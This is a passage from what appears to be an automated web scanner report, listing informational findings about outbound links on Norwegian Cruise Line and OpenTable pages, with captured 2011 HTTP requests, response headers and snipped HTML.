User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 13:02:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 40739
Content-Type: text/html
Connection: close
Via: 1.1 mcoatprdslb2 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=0ace8fd9; path=/; expires=Mon, 03 Oct 2011 13:07:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv
...[SNIP]...
</script>
<script src="https://dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2&s=1" type="text/javascript">// </script>
...[SNIP]...
17.44. http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ncl.com
Path:   /nclweb/cbooking/pricingQualifierForm.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /nclweb/cbooking/pricingQualifierForm.html;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336 HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.4.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646122505-New%7C1320238122505%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B; JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; NCLPERSIST1=868788416.20480.0000

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 69014
Date: Mon, 03 Oct 2011 12:48:23 GMT
Connection: close


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8">
<title>


NCL - Ge
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/utilities/utilities.js"></script>
...[SNIP]...
<div id="footer">


<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...
</a><a href="http://www.twitter.com/NCLFreestyle" target="_blank" style="color:white; text-decoration:none; float:left;"><img src="/csimages/960/920/ncl_footer_block_twitter.png" width="24" height="24" alt="Follow Us on Twitter" border="0" style="margin:5px 5px 5px 0px;" /></a><a href="http://www.twitter.com/NCLFreestyle" target="_blank" style="color:white; text-decoration:none; float:left; padding:8px 12px 0 3px;">Follow Us</a><a href="http://www.youtube.com/user/NCLFreestyle" target="_blank" style="color:white; text-decoration:none; float:left;"><img src="/csimages/112/3/ncl_footer_block_youtube.png" width="24" height="24" alt="Watch us on YouTube" border="0" style="margin:5px 5px 5px 0px;" /></a><a href="http://www.youtube.com/user/NCLFreestyle" target="_blank" style="color:white; text-decoration:none; float:left; padding:8px 3px 0 3px;">Videos</a>
...[SNIP]...
<li><a href="http://www.starcruises.com/newweb/main.aspx">Star Cruises</a>
...[SNIP]...
<li><a href="http://www.ncl.eu/" target="_blank">Europe</a>
...[SNIP]...
<li><a href="http://www.ncl.de/" target="_blank">Germany</a>
...[SNIP]...
<li><a href="http://www.es.ncl-freestylecruising.eu/index.php" target="_blank">Spain</a>
...[SNIP]...
<li><a href="http://www.it.ncl.eu/" target="_blank">Italy</a>
...[SNIP]...
<div class="social_buttons"><a target="_blank" href="http://www.youtube.com/user/NCLFreestyle"><img src="/csimages/536/714/icon_youtube.png"></a> <a target="_blank" href="http://www.facebook.com/Norwegiancruiseline?ref=s"><img src="/csimages/263/343/icon_facebook.png"></a><a target="_blank" href="http://twitter.com/NCLFreestyle"><img src="/csimages/360/608/icon_twitter.png">
...[SNIP]...
<br><a target="_blank" href="http://www.flickr.com/groups/ncl/"><img src="/csimages/264/38/icon_flickr.png">
...[SNIP]...
</a><a target="_blank" href="http://delicious.com/nclfreestyle"><img src="/csimages/926/195/icon_delicious.png">
...[SNIP]...
<li class="last"><a target="_blank" href="https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry?sc=uaba87#apply" title="WorldPoints Cruise Credit Card Application">Apply Now</a>
...[SNIP]...
<!-- End Modal Area -->


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/event-mouseenter/event-mouseenter-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/json/json-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/container/container-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/button/button-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...
17.45. http://www.opentable.com/frontdoor/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /frontdoor/default.aspx?rid=90&restref=90&bgcolor=e3d4a4&titlecolor=000000&subtitlecolor=000000&btnbgimage=http://www.opentable.com/frontdoor/img/ot_btn_black.png&otlink=FFFFFF&icon=dark&mode=short HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 12:53:35 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:53:35 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; domain=.opentable.com; path=/
Vary: Accept-Encoding
Content-Length: 64483

document.write("<link href=\"http://www.opentable.com/frontdoor/css/ot_short.css?v=Web_11_10_0_11.prod.com\" rel=\"styleSheet\" type=\"text/css\" /><!--[if IE]><link type=\"text/css\" href=\"http://ww
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://o.opentable.com/b/ss/otrestref/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...
17.46. http://www.opentable.com/interim.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=136; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head><meta http-equiv="content-type" content="text/html; chars
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://o.opentable.com/b/ss/otrestref/1/H.22.1--NS/0" height="1" width="1" border="0" alt="" />
...[SNIP]...
17.47. http://www.opentable.com/jaspers-corner-tap-and-kitchen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /jaspers-corner-tap-and-kitchen?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0b0tKkwEp2937edj1JsmX2; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
<dt id="RestaurantProfile_RestaurantProfileToolbar_toolbarMap" class="mapIcon">
               <a id="RestaurantProfile_RestaurantProfileToolbar_linkMapLink" class="mapIconLink" rel="nofollow" href="http://maps.google.com/?hl=en&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=401+Taylor+St.,San+Francisco,CA,94102" target="_blank"></a>
           </dt>
           <dd id="RestaurantProfile_RestaurantProfileToolbar_toolbarMapLink" class="map">    
               <a id="RestaurantProfile_RestaurantProfileToolbar_linkMapLinkText" class="ToolbarLinkText" rel="nofollow" href="http://maps.google.com/?hl=en&amp;ie=UTF-8&amp;oe=UTF-8&amp;q=401+Taylor+St.,San+Francisco,CA,94102" target="_blank">Map</a>
...[SNIP]...
</b>: <a href=http://www.jasperscornertap.com/ target=_new>http://www.jasperscornertap.com/</a>
...[SNIP]...
<dd class="last"><a href="http://www.zagat.com/verticals/PropertyDetails.aspx?VID=8&R=47889" rel="nofollow" target=_NEW>Read Member Reviews</a>
...[SNIP]...
<dd class="last"><a href="http://sfgate.com/cgi-bin/article.cgi?f=/c/a/2000/03/26/PK107832.DTL" rel="nofollow" target=_NEW>Chronicle Restaurant Review</a>
...[SNIP]...
<dd class="last"><a href="http://www.gayot.com/restaurants/ponzu-san-francisco-ca-94102_3sf00963.html" target=_NEW>Read Gayot Review</a>
...[SNIP]...
<dd class="last"><a href="http://yellowpages.aol.com/business/ca/san-francisco/ponzu/0-100923534/" rel="nofollow" target=_NEW>View ratings and see what's nearby</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_8/5/rating.gif" alt="3.8 / 5" title="3.8 / 5"/>
</div>
...[SNIP]...
<a name="BV_TrackingTag_Rating_Summary_1_ExpandHistogram_200" target="_blank" href="http://reviews.opentable.com/0938/200/ratingsnapshot.htm"> <img src="http://opentable.ugc.bazaarvoice.com/static/0938/openRatingsHistogram.gif" alt="Open Ratings Snapshot" />
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_7/5/ratingSecondary.gif" alt="3.7 / 5" title="3.7 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_1/5/ratingSecondary.gif" alt="4.1 / 5" title="4.1 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_5/5/ratingSecondary.gif" alt="3.5 / 5" title="3.5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_5/3/ratingSlider.gif" alt="2.5 / 3" title="2.5 / 3" />
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_8/5/rating.gif" alt="3.8 / 5" title="3.8 / 5"/>
</div>
...[SNIP]...
<a name="BV_TrackingTag_Rating_Summary_2_ExpandHistogram_200" target="_blank" href="http://reviews.opentable.com/0938/200/ratingsnapshot.htm"> <img src="http://opentable.ugc.bazaarvoice.com/static/0938/openRatingsHistogram.gif" alt="Open Ratings Snapshot" />
</a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_7/5/ratingSecondary.gif" alt="3.7 / 5" title="3.7 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_1/5/ratingSecondary.gif" alt="4.1 / 5" title="4.1 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_5/5/ratingSecondary.gif" alt="3.5 / 5" title="3.5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_5/3/ratingSlider.gif" alt="2.5 / 3" title="2.5 / 3" />
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/5/rating.gif" alt="3 / 5" title="3 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/5/ratingSecondary.gif" alt="2 / 5" title="2 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/3_0/3/ratingSlider.gif" alt="Energetic" title="Energetic" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24524488&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/rating.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24480565&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/ratingSecondary.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/4_0/5/ratingSecondary.gif" alt="4 / 5" title="4 / 5"/>
</div>
...[SNIP]...
<div class="BVRRRatingSliderImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/2_0/3/ratingSlider.gif" alt="Moderate" title="Moderate" />
</div>
...[SNIP]...
book&amp;url=http%3A%2F%2Freviews.opentable.com%2F0938%2F200%2Freviews.htm%3FreviewID%3D24321913&amp;title=__TITLE__&amp;robot=__ROBOT__" onmouseover="this.href=bvReplaceTokensInSocialURL(this.href);"><img width="16"
height="16"
class="BVRRSocialBookmarkLinkImage"
src="http://opentable.ugc.bazaarvoice.com/static/0938/link-facebook.gif"
alt="Facebook"
title="Add to Facebook"/></a>
...[SNIP]...
<div class="BVRRRatingNormalImage"> <img src="http://opentable.ugc.bazaarvoice.com/0938/5_0/5/rating.gif" alt="5 / 5" title="5 / 5"/>
</div>
...[SNIP]...
<span class="BVRRLinkSpan"><img src="http://opentable.ugc.bazaarvoice.com/static/0938/noAvatar.gif" alt="Customer Avatar" title="Customer Avatar"/></span>
...[SNIP]...
